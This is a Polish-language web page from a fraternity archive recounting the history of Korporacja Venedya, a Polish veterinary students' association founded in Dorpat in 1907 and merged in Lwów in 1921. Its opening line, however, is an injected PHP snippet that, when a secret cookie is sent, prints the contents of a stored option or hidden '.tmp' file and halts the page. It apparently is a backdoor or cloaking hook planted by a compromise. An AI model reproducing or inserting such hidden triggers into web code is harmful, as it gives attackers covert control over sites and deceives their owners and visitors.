if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Venedya

Dekiel Venedyi - vide Poszukiwania. Nazwa:
Korporacja Venedya
Siedziba:
Dorpat
Data powstania:
4 II 1907 r.
Barwy:
błękitna – ciemnoczerwona – srebrna (symbolika barw: braterstwo i przyjaźń – energia i siła – prawda i wiedza)
Dewiza:
“Braterstwem i pracą”

Rys historyczny

Venedya, Dorpat.

Venedya została złożona dnia 4 II 1907 r. przez grupę 13 studentów Instytutu Weterynaryjnego, którzy opuścili K! Lutycya i postanowili założyć nowe stowarzyszenie. Już dnia 12 II 1907 r. nowa korporacja została formalnie zatwierdzona przez Radę Profesorów Instytutu Weterynaryjnego.

Venedya, Dorpat.

Wśród założycieli Venedyi - jak podaje Konrad Millak - było pięciu “starych dorpatczyków” oraz ośmiu “byłych warszawiaków”, wcześniej słuchaczy Instytutu Weterynaryjnego w Warszawie, którzy w związku z bojkotem uczelni warszawskiej po strajkach w latach 1905-1906 przybyli w początkach 1907 r. do Dorpatu, aby kontynuować studia przerwane w Warszawie. Stowarzyszeniu nadano - podobnie jak ryskim korporacjom Arkonia i Welecja oraz dorpackiej Lutycji - nazwę związaną z historią zachodniej Słowiańszczyzny. W historiografii Wenedami określano Słowian nadbałtyckich i łużyckich, którzy przez wieki zmagali się z naporem germańskim.

Venedya, Dorpat.

Venedya była stowarzyszeniem “Polaków i Litwinów studentów Dorpackiego Instytutu Weterynaryjnego”. W konsekwencji, podobnie jak Lutycja, była korporacją skupiającą co do zasady wyłącznie studentów weterynarii. Wyjątkowo do związku mogli należeć jako tzw. członkowie-goście studenci innych kierunków studiów. Oficjalnymi celami Venedyi było - zgodnie z dewizą “Braterstwem i pracą” - “łączenie się studentów Polaków i Litwinów oraz wzajemne samokształcenie”. W rzeczywistości podobnie jak w przypadku innych polskich związków korporacyjnych celem korporacji było także “zachowanie, pielęgnowanie i rozwijanie polskości wśród członków stowarzyszenia, rzuconych na obcy narodowościowo (…) teren i wystawionych na wpływy częstokroć wrogie wszystkiemu co polskie.” Dla realizacji postawionych przed sobą zadań Venedya podobnie jak Lutycja gromadziła polskie i zagraniczne książki naukowe, literaturę piękną, czasopisma. Prowadziła bibliotekę, czytelnię, gabinet naukowy oraz stołówkę. Utrzymywała kontakty z innymi polskimi korporacjami z Dorpatu, Rygi i Petersburga.

Sobótka Venedyi, Dorpat.

W odróżnieniu od Lutycji - i to prawdopodobnie było jedną z przyczyn jej powstania - Venedya w sposób dla postronnego obserwatora bardziej widoczny nawiązywała do modelu organizacyjnego korporacji akademickich. Objawiało się to przede wszystkim w fakcie, że jej członkowie podobnie jak ryscy Arkoni i Weleci oraz po 1907 r. także dorpaccy Polonusi nosili barwy tj. błękitne dekle (czapki) oraz błękitno-ciemnoczerwono-srebrne bandy (szarfy).

Po zajęciu Dorpatu przez wojska niemieckie w 1918 r. działalność Venedyi zamarła. Ostatni członkowie korporacji przewieźli niewielką część dobytku korporacji do Lwowa, gdzie zamierzali kontynuować przerwane studia. Tam też w 1920 r. wznowiono działalność Venedyi. W lipcu 1921 r. na II Wszechpolskim Zjeździe Lekarzy Weterynaryjnych w Poznaniu w myśl porozumienia zawartego przez członków Lutycji i Venedyi doszło do połączenia obu stowarzyszeń w korporację pod nazwą K! Lutyko-Venedya. Związek ten działał we Lwowie do 1939 r.

Oparta o ustalenia Konrada Millaka lista członków Venedyi za okres 1907-1918 obejmuje 88 nazwisk. Na stronie Archiwum znajduje się ona w zbiorczym zestawieniu w części poświęconej K! Lutyko-Venedya.

Bibliografia:

1) Konrad Millak, Polskie stowarzyszenia studentów weterynarii w Dorpacie do 1918 roku, (w:) Zeszyty Naukowe SGGW - Seria Historyczna, z. 2, Warszawa 1965, s. 93 i n.,
2) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Lutyko-Venedya (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 34 i n.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 13 X 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Venedya (Dorpat, Lwów), (na:) www.archiwumkorporacyjne.pl, stan 13 X 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }